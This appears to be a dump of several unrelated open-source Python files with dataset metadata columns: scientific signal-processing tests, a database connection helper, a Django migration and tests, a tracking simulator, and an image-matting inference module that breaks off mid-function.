numba_autocorr_inner(x, numba_xc, N)
for i, j in zip(py_xc, numba_xc):
self.assertFloatEqual(i, j)
def test_autocorr(self):
"""correctly compute autocorrelation"""
s = [1, 1, 1, 1]
X, periods = auto_corr(s, llim=-3, ulim=None)
exp_X = array([1, 2, 3, 4, 3, 2, 1], dtype=float)
self.assertEqual(X, exp_X)
auto_x, auto_periods = auto_corr(self.sig, llim=2, ulim=50)
max_idx = list(auto_x).index(max(auto_x))
auto_p = auto_periods[max_idx]
self.assertEqual(auto_p, self.p)
def test_dft(self):
"""correctly compute discrete fourier transform"""
dft_x, dft_periods = dft(self.sig)
dft_x = abs(dft_x)
max_idx = list(dft_x).index(max(dft_x))
dft_p = dft_periods[max_idx]
self.assertEqual(int(dft_p), self.p)
def test_ipdft(self):
"""correctly compute integer discrete fourier transform"""
s = [0, 1, 0, -1, 0, 1, 0, -1]
X, periods = ipdft(s, llim=1, ulim=len(s))
exp_X = abs(
array(
[
0,
0,
-1.5 + 0.866j,
-4j,
2.927 - 0.951j,
1.5 + 0.866j,
0.302 + 0.627j,
0,
]
)
)
X = abs(X)
self.assertFloatEqual(X, exp_X, eps=1e-3)
ipdft_x, ipdft_periods = ipdft(self.sig, llim=2, ulim=50)
ipdft_x = abs(ipdft_x)
max_idx = list(ipdft_x).index(max(ipdft_x))
ipdft_p = ipdft_periods[max_idx]
self.assertEqual(ipdft_p, self.p)
def test_goertzel(self):
"""goertzel and ipdft should be the same"""
ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=10, ulim=10)
self.assertFloatEqual(goertzel(self.sig, 10), ipdft_pwr)
def test_hybrid(self):
"""correctly compute hybrid statistic"""
hybrid_x, hybrid_periods = hybrid(self.sig, llim=None, ulim=50)
hybrid_x = abs(hybrid_x)
max_idx = list(hybrid_x).index(max(hybrid_x))
hybrid_p = hybrid_periods[max_idx]
self.assertEqual(hybrid_p, self.p)
def test_hybrid_returns_all(self):
"""correctly returns hybrid, ipdft and autocorr statistics"""
ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=2, ulim=50)
auto_x, auto_periods = auto_corr(self.sig, llim=2, ulim=50)
hybrid_x, hybrid_periods = hybrid(self.sig, llim=None, ulim=50)
hybrid_ipdft_autocorr_stats, hybrid_periods = hybrid(
self.sig, llim=None, ulim=50, return_all=True
)
self.assertEqual(hybrid_ipdft_autocorr_stats[0], hybrid_x)
self.assertEqual(hybrid_ipdft_autocorr_stats[1], ipdft_pwr)
self.assertEqual(hybrid_ipdft_autocorr_stats[2], auto_x)
ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=10, ulim=10)
auto_x, auto_periods = auto_corr(self.sig, llim=10, ulim=10)
hybrid_x, hybrid_periods = hybrid(self.sig, llim=10, ulim=10)
hybrid_ipdft_autocorr_stats, hybrid_periods = hybrid(
self.sig, llim=10, ulim=10, return_all=True
)
self.assertEqual(hybrid_ipdft_autocorr_stats[0], hybrid_x)
self.assertEqual(hybrid_ipdft_autocorr_stats[1], ipdft_pwr)
self.assertEqual(hybrid_ipdft_autocorr_stats[2], auto_x)
if __name__ == "__main__":
main()
| 32.135359 | 79 | 0.458265 | from numpy import arange, array, convolve, exp, float64, pi, random, sin, zeros
from cogent3.maths.period import _autocorr_inner2 as py_autocorr_inner
from cogent3.maths.period import _goertzel_inner as py_goertzel_inner
from cogent3.maths.period import _ipdft_inner2 as py_ipdft_inner
from cogent3.maths.period import auto_corr, dft, goertzel, hybrid, ipdft
from cogent3.maths.period_numba import autocorr_inner as numba_autocorr_inner
from cogent3.maths.period_numba import goertzel_inner as numba_goertzel_inner
from cogent3.maths.period_numba import ipdft_inner as numba_ipdft_inner
from cogent3.util.unit_test import TestCase, main
__author__ = "Hua Ying, Julien Epps and Gavin Huttley"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["Julien Epps", "Hua Ying", "Gavin Huttley"]
__license__ = "BSD-3"
__version__ = "2020.2.7a"
__maintainer__ = "Gavin Huttley"
__email__ = "Gavin.Huttley@anu.edu.au"
__status__ = "Production"
class TestPeriod(TestCase):
def setUp(self):
t = arange(0, 10, 0.1)
n = random.randn(len(t))
nse = convolve(n, exp(-t / 0.05)) * 0.1
nse = nse[: len(t)]
self.sig = sin(2 * pi * t) + nse
self.p = 10
def test_inner_funcs(self):
x = array(
[
0.04874203,
0.56831373,
0.94267804,
0.95664485,
0.60719478,
-0.09037356,
-0.69897319,
-1.11239811,
-0.84127485,
-0.56281126,
0.02301213,
0.56250284,
1.0258557,
1.03906527,
0.69885916,
0.10103556,
-0.43248024,
-1.03160503,
-0.84901545,
-0.84934356,
0.00323728,
0.44344594,
0.97736748,
1.01635433,
0.38538423,
0.09869918,
-0.60441861,
-0.90175391,
-1.00166887,
-0.66303249,
-0.02070569,
0.76520328,
0.93462426,
0.97011673,
0.63199999,
0.0764678,
-0.55680168,
-0.92028808,
-0.98481451,
-0.57600588,
0.0482667,
0.57572519,
1.02077883,
0.93271663,
0.41581696,
-0.07639671,
-0.71426286,
-0.97730119,
-1.0370596,
-0.67919572,
0.03779302,
0.60408759,
0.87826068,
0.79126442,
0.69769622,
0.01419442,
-0.42917556,
-1.00100485,
-0.83945546,
-0.55746313,
0.12730859,
0.60057659,
0.98059721,
0.83275501,
0.69031804,
0.02277554,
-0.63982729,
-1.23680355,
-0.79477887,
-0.67773375,
-0.05204714,
0.51765381,
0.77691955,
0.8996709,
0.5153137,
0.01840839,
-0.65124866,
-1.13269058,
-0.92342177,
-0.45673709,
0.11212881,
0.50153941,
1.09329507,
0.96457193,
0.80271578,
-0.0041043,
-0.81750772,
-0.99259986,
-0.92343788,
-0.57694955,
0.13982059,
0.56653375,
0.82217563,
0.85162513,
0.3984116,
-0.18937514,
-0.65304629,
-1.0067146,
-1.0037422,
-0.68011283,
]
)
N = 100
period = 10
self.assertFloatEqual(
py_goertzel_inner(x, N, period), numba_goertzel_inner(x, N, period)
)
ulim = 8
N = 8
x = array([0.0, 1.0, 0.0, -1.0, 0.0, 1.0, 0.0, -1.0])
X = zeros(8, dtype="complex128")
W = array(
[
1.00000000e00 + 2.44929360e-16j,
-1.00000000e00 - 1.22464680e-16j,
-5.00000000e-01 - 8.66025404e-01j,
6.12323400e-17 - 1.00000000e00j,
3.09016994e-01 - 9.51056516e-01j,
5.00000000e-01 - 8.66025404e-01j,
6.23489802e-01 - 7.81831482e-01j,
7.07106781e-01 - 7.07106781e-01j,
]
)
py_result = py_ipdft_inner(x, X, W, ulim, N)
numba_result = numba_ipdft_inner(x, X, W, ulim, N)
for i, j in zip(py_result, numba_result):
self.assertFloatEqual(abs(i), abs(j))
x = array(
[
-0.07827614,
0.56637551,
1.01320526,
1.01536245,
0.63548361,
0.08560101,
-0.46094955,
-0.78065656,
-0.8893556,
-0.56514145,
0.02325272,
0.63660719,
0.86291302,
0.82953598,
0.5706848,
0.11655242,
-0.6472655,
-0.86178218,
-0.96495057,
-0.76098445,
-0.18911517,
0.59280646,
1.00248693,
0.89241423,
0.52475111,
-0.01620599,
-0.60199278,
-0.98279829,
-1.12469771,
-0.61355799,
0.04321191,
0.52784788,
0.68508784,
0.86015123,
0.66825756,
-0.0802846,
-0.63626753,
-0.93023345,
-0.99129547,
-0.46891033,
0.04145813,
0.71226518,
1.01499246,
0.94726778,
0.63598143,
-0.21920589,
-0.48071702,
-0.86041579,
-0.9046141,
-0.55714746,
-0.10052384,
0.69708969,
1.02575789,
1.16524031,
0.49895282,
-0.13068573,
-0.45770419,
-0.86155787,
-0.9230734,
-0.6590525,
-0.05072955,
0.52380317,
1.02674335,
0.87778499,
0.4303284,
-0.01855665,
-0.62858193,
-0.93954774,
-0.94257301,
-0.49692951,
0.00699347,
0.69049074,
0.93906549,
1.06339809,
0.69337543,
0.00252569,
-0.57825881,
-0.88460603,
-0.99259672,
-0.73535697,
0.12064751,
0.91159174,
0.88966993,
1.02159917,
0.43479926,
-0.06159005,
-0.61782651,
-0.95284676,
-0.8218889,
-0.52166419,
0.021961,
0.52268762,
0.79428288,
1.01642697,
0.49060377,
-0.02183994,
-0.52743836,
-0.99363909,
-1.02963821,
-0.64249996,
]
)
py_xc = zeros(2 * len(x) - 1, dtype=float64)
numba_xc = py_xc.copy()
N = 100
py_autocorr_inner(x, py_xc, N)
numba_autocorr_inner(x, numba_xc, N)
for i, j in zip(py_xc, numba_xc):
self.assertFloatEqual(i, j)
def test_autocorr(self):
s = [1, 1, 1, 1]
X, periods = auto_corr(s, llim=-3, ulim=None)
exp_X = array([1, 2, 3, 4, 3, 2, 1], dtype=float)
self.assertEqual(X, exp_X)
auto_x, auto_periods = auto_corr(self.sig, llim=2, ulim=50)
max_idx = list(auto_x).index(max(auto_x))
auto_p = auto_periods[max_idx]
self.assertEqual(auto_p, self.p)
def test_dft(self):
dft_x, dft_periods = dft(self.sig)
dft_x = abs(dft_x)
max_idx = list(dft_x).index(max(dft_x))
dft_p = dft_periods[max_idx]
self.assertEqual(int(dft_p), self.p)
def test_ipdft(self):
s = [0, 1, 0, -1, 0, 1, 0, -1]
X, periods = ipdft(s, llim=1, ulim=len(s))
exp_X = abs(
array(
[
0,
0,
-1.5 + 0.866j,
-4j,
2.927 - 0.951j,
1.5 + 0.866j,
0.302 + 0.627j,
0,
]
)
)
X = abs(X)
self.assertFloatEqual(X, exp_X, eps=1e-3)
ipdft_x, ipdft_periods = ipdft(self.sig, llim=2, ulim=50)
ipdft_x = abs(ipdft_x)
max_idx = list(ipdft_x).index(max(ipdft_x))
ipdft_p = ipdft_periods[max_idx]
self.assertEqual(ipdft_p, self.p)
def test_goertzel(self):
ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=10, ulim=10)
self.assertFloatEqual(goertzel(self.sig, 10), ipdft_pwr)
def test_hybrid(self):
hybrid_x, hybrid_periods = hybrid(self.sig, llim=None, ulim=50)
hybrid_x = abs(hybrid_x)
max_idx = list(hybrid_x).index(max(hybrid_x))
hybrid_p = hybrid_periods[max_idx]
self.assertEqual(hybrid_p, self.p)
def test_hybrid_returns_all(self):
ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=2, ulim=50)
auto_x, auto_periods = auto_corr(self.sig, llim=2, ulim=50)
hybrid_x, hybrid_periods = hybrid(self.sig, llim=None, ulim=50)
hybrid_ipdft_autocorr_stats, hybrid_periods = hybrid(
self.sig, llim=None, ulim=50, return_all=True
)
self.assertEqual(hybrid_ipdft_autocorr_stats[0], hybrid_x)
self.assertEqual(hybrid_ipdft_autocorr_stats[1], ipdft_pwr)
self.assertEqual(hybrid_ipdft_autocorr_stats[2], auto_x)
ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=10, ulim=10)
auto_x, auto_periods = auto_corr(self.sig, llim=10, ulim=10)
hybrid_x, hybrid_periods = hybrid(self.sig, llim=10, ulim=10)
hybrid_ipdft_autocorr_stats, hybrid_periods = hybrid(
self.sig, llim=10, ulim=10, return_all=True
)
self.assertEqual(hybrid_ipdft_autocorr_stats[0], hybrid_x)
self.assertEqual(hybrid_ipdft_autocorr_stats[1], ipdft_pwr)
self.assertEqual(hybrid_ipdft_autocorr_stats[2], auto_x)
if __name__ == "__main__":
main()
| true | true |
1c2ca72ba0a51bfb6047dce162693e6840c202cc | 1,589 | py | Python | stonesoup/simulator/platform.py | SohSalari/Stone-Soup | e073d4145df18facad43e4ab7b0a34e8d65f67ee | [
"MIT"
] | 1 | 2020-07-21T15:20:20.000Z | 2020-07-21T15:20:20.000Z | stonesoup/simulator/platform.py | mgomesborges/Stone-Soup | 39c7f02ce11e10c9b3c612ad359f6d8bca495266 | [
"MIT"
] | null | null | null | stonesoup/simulator/platform.py | mgomesborges/Stone-Soup | 39c7f02ce11e10c9b3c612ad359f6d8bca495266 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from ..base import Property
from ..reader import GroundTruthReader
from .base import DetectionSimulator
from ..buffered_generator import BufferedGenerator
from ..platform import Platform
class PlatformDetectionSimulator(DetectionSimulator):
"""A simple platform detection simulator.
Processes ground truth data and generates :class:`~.Detection` data
according to a list of platforms by calling each sensor in these platforms.
"""
groundtruth = Property(GroundTruthReader,
doc='Source of ground truth tracks used to generate'
' detections for.')
platforms = Property([Platform],
doc='List of platforms in :class:`~.Platform` to '
'generate sensor detections from.')
@BufferedGenerator.generator_method
def detections_gen(self):
for time, truths in self.groundtruth:
for platform in self.platforms:
platform.move(time)
for platform in self.platforms:
for sensor in platform.sensors:
detections = set()
for truth in truths.union(self.platforms):
# Make sure platform's sensors do not measure itself
if truth is platform:
continue
detection = sensor.measure(truth)
if detection is not None:
detections.add(detection)
yield time, detections
| 37.833333 | 79 | 0.582127 |
from ..base import Property
from ..reader import GroundTruthReader
from .base import DetectionSimulator
from ..buffered_generator import BufferedGenerator
from ..platform import Platform
class PlatformDetectionSimulator(DetectionSimulator):
groundtruth = Property(GroundTruthReader,
doc='Source of ground truth tracks used to generate'
' detections for.')
platforms = Property([Platform],
doc='List of platforms in :class:`~.Platform` to '
'generate sensor detections from.')
@BufferedGenerator.generator_method
def detections_gen(self):
for time, truths in self.groundtruth:
for platform in self.platforms:
platform.move(time)
for platform in self.platforms:
for sensor in platform.sensors:
detections = set()
for truth in truths.union(self.platforms):
if truth is platform:
continue
detection = sensor.measure(truth)
if detection is not None:
detections.add(detection)
yield time, detections
| true | true |
1c2ca80e2a0454be3248cf10b328f2d2d86dfa74 | 420 | py | Python | Lab_6/data/core/myservices/__init__.py | Opty1337/CN | bc01cf39bcc017783fdbb84ebd7958f405511e6c | [
"MIT"
] | null | null | null | Lab_6/data/core/myservices/__init__.py | Opty1337/CN | bc01cf39bcc017783fdbb84ebd7958f405511e6c | [
"MIT"
] | null | null | null | Lab_6/data/core/myservices/__init__.py | Opty1337/CN | bc01cf39bcc017783fdbb84ebd7958f405511e6c | [
"MIT"
] | null | null | null | """myservices
Custom services that you define can be put in this directory. Everything
listed in __all__ is automatically loaded when you add this directory to the
custom_services_dir = '/full/path/to/here' core.conf file option.
"""
__all__ = ["trafficdump", "pcpingweb01", "linkadsl_u128k", "linkadsl_u256k", "linkadsl_u512k", "linkadsl_u768k", "linkadsl_u1024k", "linkbw4g_u5800k", "linkcable_u8000k", "simplenat"]
| 52.5 | 183 | 0.77381 | __all__ = ["trafficdump", "pcpingweb01", "linkadsl_u128k", "linkadsl_u256k", "linkadsl_u512k", "linkadsl_u768k", "linkadsl_u1024k", "linkbw4g_u5800k", "linkcable_u8000k", "simplenat"]
| true | true |
1c2ca9762c3d53a7dac08a120f7e7e60f5b4c3d4 | 1,783 | py | Python | ejercicios_basicos/trabajo_bd/capa_datos/conexion.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | ejercicios_basicos/trabajo_bd/capa_datos/conexion.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | ejercicios_basicos/trabajo_bd/capa_datos/conexion.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | import os
from dotenv import load_dotenv
import psycopg2 as db
from logger_base import log
import sys
load_dotenv()
class Conexion:
__DATABASE = os.getenv("DATABASE")
__USER = os.getenv("USER")
__PASSWORD = os.getenv("PASSWORD")
__HOST = os.getenv("HOST")
__PORT = os.getenv("PORT")
__conexion = None
__cursor = None
@classmethod
def obtener_conexion(cls):
if cls.__conexion is None:
try:
cls.__conexion = db.connect(
database=cls.__DATABASE,
user=cls.__USER,
password=cls.__PASSWORD,
host=cls.__HOST,
port=cls.__PORT
)
log.debug("Conexión establecida")
return cls.__conexion
except Exception as e:
log.error("Ocurrio un error en la conexion: {}".format(e))
sys.exit(1)
else:
return cls.__conexion
@classmethod
def obtener_cursor(cls):
if cls.__cursor is None or cls.__conexion:
try:
cls.__cursor = cls.obtener_conexion().cursor()
log.debug("Cursor establecido: {}".format(cls.__cursor))
return cls.__cursor
except Exception as e:
log.error("Ocurrio un error en el cursor: {}".format(e))
sys.exit(1)
else:
return cls.__cursor
@classmethod
def cerrar(cls):
cls.__cursor.close()
cls.__conexion.close()
if __name__ == '__main__':
conexion = Conexion.obtener_conexion()
cursor = Conexion.obtener_cursor()
cursor.execute("SELECT * FROM persona")
print(cursor.fetchall())
Conexion.cerrar() | 28.758065 | 74 | 0.55244 | import os
from dotenv import load_dotenv
import psycopg2 as db
from logger_base import log
import sys
load_dotenv()
class Conexion:
__DATABASE = os.getenv("DATABASE")
__USER = os.getenv("USER")
__PASSWORD = os.getenv("PASSWORD")
__HOST = os.getenv("HOST")
__PORT = os.getenv("PORT")
__conexion = None
__cursor = None
@classmethod
def obtener_conexion(cls):
if cls.__conexion is None:
try:
cls.__conexion = db.connect(
database=cls.__DATABASE,
user=cls.__USER,
password=cls.__PASSWORD,
host=cls.__HOST,
port=cls.__PORT
)
log.debug("Conexión establecida")
return cls.__conexion
except Exception as e:
log.error("Ocurrio un error en la conexion: {}".format(e))
sys.exit(1)
else:
return cls.__conexion
@classmethod
def obtener_cursor(cls):
if cls.__cursor is None or cls.__conexion:
try:
cls.__cursor = cls.obtener_conexion().cursor()
log.debug("Cursor establecido: {}".format(cls.__cursor))
return cls.__cursor
except Exception as e:
log.error("Ocurrio un error en el cursor: {}".format(e))
sys.exit(1)
else:
return cls.__cursor
@classmethod
def cerrar(cls):
cls.__cursor.close()
cls.__conexion.close()
if __name__ == '__main__':
conexion = Conexion.obtener_conexion()
cursor = Conexion.obtener_cursor()
cursor.execute("SELECT * FROM persona")
print(cursor.fetchall())
Conexion.cerrar() | true | true |
1c2cabc15b13e8b192fbcc58d43bd1df785b5832 | 2,542 | py | Python | xsboringen/scripts/write_csv.py | TheFrett/xsboringen | 92283809ca5dcf03dac661720a683a90dc2ff9f7 | [
"MIT"
] | null | null | null | xsboringen/scripts/write_csv.py | TheFrett/xsboringen | 92283809ca5dcf03dac661720a683a90dc2ff9f7 | [
"MIT"
] | null | null | null | xsboringen/scripts/write_csv.py | TheFrett/xsboringen | 92283809ca5dcf03dac661720a683a90dc2ff9f7 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Tom van Steijn, Royal HaskoningDHV
# Erik van Onselen, Deltares
from xsboringen.calc import SandmedianClassifier, AdmixClassifier, LithologyClassifier
from xsboringen.csvfiles import boreholes_to_csv
from xsboringen.datasources import boreholes_from_sources
import logging
import os
from pathlib import Path
log = logging.getLogger(os.path.basename(__file__))
def write_csv(**kwargs):
# args
datasources = kwargs['datasources']
result = kwargs['result']
config = kwargs['config']
# read boreholes and CPT's from data folders
admixclassifier = AdmixClassifier(
config['admix_fieldnames']
)
borehole_sources = datasources.get('boreholes') or []
boreholes = boreholes_from_sources(borehole_sources, admixclassifier)
# translate CPT to lithology if needed
if result.get('translate_cpt', False):
ruletype = result.get('cpt_classifier') or 'isbt'
table = config['cpt_classification']
lithologyclassifier = LithologyClassifier(table, ruletype=ruletype)
boreholes = (
b.to_lithology(lithologyclassifier, admixclassifier)
for b in boreholes
)
# classify sandmedian if needed
if result.get('classify_sandmedian', False):
bins = config['sandmedianbins']
sandmedianclassifier = SandmedianClassifier(bins)
boreholes = (
b.update_sandmedianclass(sandmedianclassifier) for b in boreholes
)
# simplify if needed
if result.get('simplify'):
min_thickness = result.get('min_thickness')
simplify_by = result.get('simplify_by') or config['simplify_by']
if not isinstance(simplify_by, list):
simplify_by = [simplify_by,]
by = lambda s: {a: getattr(s, a) for a in simplify_by}
boreholes = (
b.simplified(min_thickness=min_thickness, by=by) if b.format in result.get('simplify')
else b
for b in boreholes
)
# write output to csv
# extra_fields = result.get('extra_fields') or {}
# extra_fields = {k: tuple(v) for k, v in extra_fields.items()}
# boreholes_to_csv(boreholes, result['csvfile'],
# extra_fields=extra_fields,
# )
# write output to pickle
if result.get('save_pickle', False):
import pickle
#iets = [b for b in boreholes]
f = open(Path(result['csvfile']).parent.joinpath('boreholes.p'), 'wb')
pickle.dump([b for b in boreholes], f)
| 33.012987 | 99 | 0.659717 |
from xsboringen.calc import SandmedianClassifier, AdmixClassifier, LithologyClassifier
from xsboringen.csvfiles import boreholes_to_csv
from xsboringen.datasources import boreholes_from_sources
import logging
import os
from pathlib import Path
log = logging.getLogger(os.path.basename(__file__))
def write_csv(**kwargs):
datasources = kwargs['datasources']
result = kwargs['result']
config = kwargs['config']
admixclassifier = AdmixClassifier(
config['admix_fieldnames']
)
borehole_sources = datasources.get('boreholes') or []
boreholes = boreholes_from_sources(borehole_sources, admixclassifier)
# translate CPT to lithology if needed
if result.get('translate_cpt', False):
ruletype = result.get('cpt_classifier') or 'isbt'
table = config['cpt_classification']
lithologyclassifier = LithologyClassifier(table, ruletype=ruletype)
boreholes = (
b.to_lithology(lithologyclassifier, admixclassifier)
for b in boreholes
)
# classify sandmedian if needed
if result.get('classify_sandmedian', False):
bins = config['sandmedianbins']
sandmedianclassifier = SandmedianClassifier(bins)
boreholes = (
b.update_sandmedianclass(sandmedianclassifier) for b in boreholes
)
# simplify if needed
if result.get('simplify'):
min_thickness = result.get('min_thickness')
simplify_by = result.get('simplify_by') or config['simplify_by']
if not isinstance(simplify_by, list):
simplify_by = [simplify_by,]
by = lambda s: {a: getattr(s, a) for a in simplify_by}
boreholes = (
b.simplified(min_thickness=min_thickness, by=by) if b.format in result.get('simplify')
else b
for b in boreholes
)
# write output to csv
# extra_fields = result.get('extra_fields') or {}
# extra_fields = {k: tuple(v) for k, v in extra_fields.items()}
# boreholes_to_csv(boreholes, result['csvfile'],
# extra_fields=extra_fields,
# )
# write output to pickle
if result.get('save_pickle', False):
import pickle
#iets = [b for b in boreholes]
f = open(Path(result['csvfile']).parent.joinpath('boreholes.p'), 'wb')
pickle.dump([b for b in boreholes], f)
| true | true |
1c2caeae83a815434c4484e3d791719568404912 | 899 | py | Python | UserPage/migrations/0006_blog.py | MidnightMadne33/Image-Blog | 8d47f2c52edb28bda5c6920c4b6e5bd1f6f2a9a0 | [
"CC0-1.0"
] | null | null | null | UserPage/migrations/0006_blog.py | MidnightMadne33/Image-Blog | 8d47f2c52edb28bda5c6920c4b6e5bd1f6f2a9a0 | [
"CC0-1.0"
] | null | null | null | UserPage/migrations/0006_blog.py | MidnightMadne33/Image-Blog | 8d47f2c52edb28bda5c6920c4b6e5bd1f6f2a9a0 | [
"CC0-1.0"
] | null | null | null | # Generated by Django 2.1.7 on 2019-02-27 12:55
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('UserPage', '0005_userprofile'),
]
operations = [
migrations.CreateModel(
name='Blog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('TextContent', models.TextField()),
('ImageContent', models.ImageField(upload_to='UserMedia/User')),
('Date', models.DateField(auto_now_add=True)),
('username', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 33.296296 | 122 | 0.628476 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('UserPage', '0005_userprofile'),
]
operations = [
migrations.CreateModel(
name='Blog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('TextContent', models.TextField()),
('ImageContent', models.ImageField(upload_to='UserMedia/User')),
('Date', models.DateField(auto_now_add=True)),
('username', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| true | true |
1c2caf06b51d860afd23f610a0fe74e12a962b13 | 1,818 | py | Python | tests/db_functions/test_pad.py | shinshin86/django | 5cc81cd9eb69f5f7a711412c02039b435c393135 | [
"PSF-2.0",
"BSD-3-Clause"
] | 2 | 2020-11-04T06:26:42.000Z | 2021-01-17T19:29:52.000Z | tests/db_functions/test_pad.py | Blaahborgh/django | c591bc3ccece1514d6b419826c7fa36ada9d9213 | [
"PSF-2.0",
"BSD-3-Clause"
] | 55 | 2016-02-27T06:02:24.000Z | 2021-11-01T07:53:20.000Z | tests/db_functions/test_pad.py | Blaahborgh/django | c591bc3ccece1514d6b419826c7fa36ada9d9213 | [
"PSF-2.0",
"BSD-3-Clause"
] | 1 | 2018-12-10T03:06:36.000Z | 2018-12-10T03:06:36.000Z | from django.db.models import CharField, Value
from django.db.models.functions import Length, LPad, RPad
from django.test import TestCase
from .models import Author
class PadTests(TestCase):
def test_pad(self):
Author.objects.create(name='John', alias='j')
tests = (
(LPad('name', 7, Value('xy')), 'xyxJohn'),
(RPad('name', 7, Value('xy')), 'Johnxyx'),
(LPad('name', 6, Value('x')), 'xxJohn'),
(RPad('name', 6, Value('x')), 'Johnxx'),
# The default pad string is a space.
(LPad('name', 6), ' John'),
(RPad('name', 6), 'John '),
# If string is longer than length it is truncated.
(LPad('name', 2), 'Jo'),
(RPad('name', 2), 'Jo'),
(LPad('name', 0), ''),
(RPad('name', 0), ''),
)
for function, padded_name in tests:
with self.subTest(function=function):
authors = Author.objects.annotate(padded_name=function)
self.assertQuerysetEqual(authors, [padded_name], lambda a: a.padded_name, ordered=False)
def test_pad_negative_length(self):
for function in (LPad, RPad):
with self.subTest(function=function):
with self.assertRaisesMessage(ValueError, "'length' must be greater or equal to 0."):
function('name', -1)
def test_combined_with_length(self):
Author.objects.create(name='Rhonda', alias='john_smith')
Author.objects.create(name='♥♣♠', alias='bytes')
authors = Author.objects.annotate(filled=LPad('name', Length('alias'), output_field=CharField()))
self.assertQuerysetEqual(
authors.order_by('alias'),
[' ♥♣♠', ' Rhonda'],
lambda a: a.filled,
)
| 40.4 | 105 | 0.558856 | from django.db.models import CharField, Value
from django.db.models.functions import Length, LPad, RPad
from django.test import TestCase
from .models import Author
class PadTests(TestCase):
def test_pad(self):
Author.objects.create(name='John', alias='j')
tests = (
(LPad('name', 7, Value('xy')), 'xyxJohn'),
(RPad('name', 7, Value('xy')), 'Johnxyx'),
(LPad('name', 6, Value('x')), 'xxJohn'),
(RPad('name', 6, Value('x')), 'Johnxx'),
(LPad('name', 6), ' John'),
(RPad('name', 6), 'John '),
(LPad('name', 2), 'Jo'),
(RPad('name', 2), 'Jo'),
(LPad('name', 0), ''),
(RPad('name', 0), ''),
)
for function, padded_name in tests:
with self.subTest(function=function):
authors = Author.objects.annotate(padded_name=function)
self.assertQuerysetEqual(authors, [padded_name], lambda a: a.padded_name, ordered=False)
def test_pad_negative_length(self):
for function in (LPad, RPad):
with self.subTest(function=function):
with self.assertRaisesMessage(ValueError, "'length' must be greater or equal to 0."):
function('name', -1)
def test_combined_with_length(self):
Author.objects.create(name='Rhonda', alias='john_smith')
Author.objects.create(name='♥♣♠', alias='bytes')
authors = Author.objects.annotate(filled=LPad('name', Length('alias'), output_field=CharField()))
self.assertQuerysetEqual(
authors.order_by('alias'),
[' ♥♣♠', ' Rhonda'],
lambda a: a.filled,
)
| true | true |
1c2cafa5f1cc4b99111eb6eeaa125eabbbaaeecd | 451 | py | Python | pyfmodex/studio/library.py | CDanSantana/pyfmodex | d820712a9a5203e2e2a2547e29f9e9a02f404282 | [
"MIT"
] | null | null | null | pyfmodex/studio/library.py | CDanSantana/pyfmodex | d820712a9a5203e2e2a2547e29f9e9a02f404282 | [
"MIT"
] | null | null | null | pyfmodex/studio/library.py | CDanSantana/pyfmodex | d820712a9a5203e2e2a2547e29f9e9a02f404282 | [
"MIT"
] | null | null | null | import os
import platform
from ctypes import cdll, windll
arch = platform.architecture()[0]
if os.name == 'nt':
library_type = windll
library_name = "fmodstudio"
elif os.name == "posix":
library_type = cdll
library_name = "libfmodstudio.so"
library = None
def get_library():
global library
if not library:
library = library_type.LoadLibrary(library_name)
return library | 25.055556 | 56 | 0.634146 | import os
import platform
from ctypes import cdll, windll
arch = platform.architecture()[0]
if os.name == 'nt':
library_type = windll
library_name = "fmodstudio"
elif os.name == "posix":
library_type = cdll
library_name = "libfmodstudio.so"
library = None
def get_library():
global library
if not library:
library = library_type.LoadLibrary(library_name)
return library | true | true |
1c2cafbe43b10c7240262483e1ca414130be2c4f | 8,586 | py | Python | mmedit/apis/matting_inference.py | wchstrife/mmediting | 2a90254b677cc505df0d36a182ae710188804221 | [
"Apache-2.0"
] | null | null | null | mmedit/apis/matting_inference.py | wchstrife/mmediting | 2a90254b677cc505df0d36a182ae710188804221 | [
"Apache-2.0"
] | null | null | null | mmedit/apis/matting_inference.py | wchstrife/mmediting | 2a90254b677cc505df0d36a182ae710188804221 | [
"Apache-2.0"
] | null | null | null | import mmcv
import torch
from mmcv.parallel import collate, scatter
from mmcv.runner import load_checkpoint
from mmedit.datasets.pipelines import Compose
from mmedit.models import build_model
def init_model(config, checkpoint=None, device='cuda:0'):
"""Initialize a model from config file.
Args:
config (str or :obj:`mmcv.Config`): Config file path or the config
object.
checkpoint (str, optional): Checkpoint path. If left as None, the model
will not load any weights.
device (str): Which device the model will deploy. Default: 'cuda:0'.
Returns:
nn.Module: The constructed model.
"""
if isinstance(config, str):
config = mmcv.Config.fromfile(config)
elif not isinstance(config, mmcv.Config):
raise TypeError('config must be a filename or Config object, '
f'but got {type(config)}')
config.model.pretrained = None
config.test_cfg.metrics = None
model = build_model(config.model, test_cfg=config.test_cfg)
if checkpoint is not None:
checkpoint = load_checkpoint(model, checkpoint)
model.cfg = config # save the config in the model for convenience
model.to(device)
model.eval()
return model
def matting_inference(model, img, trimap):
"""Inference image(s) with the model.
Args:
model (nn.Module): The loaded model.
img (str): Image file path.
trimap (str): Trimap file path.
Returns:
np.ndarray: The predicted alpha matte.
"""
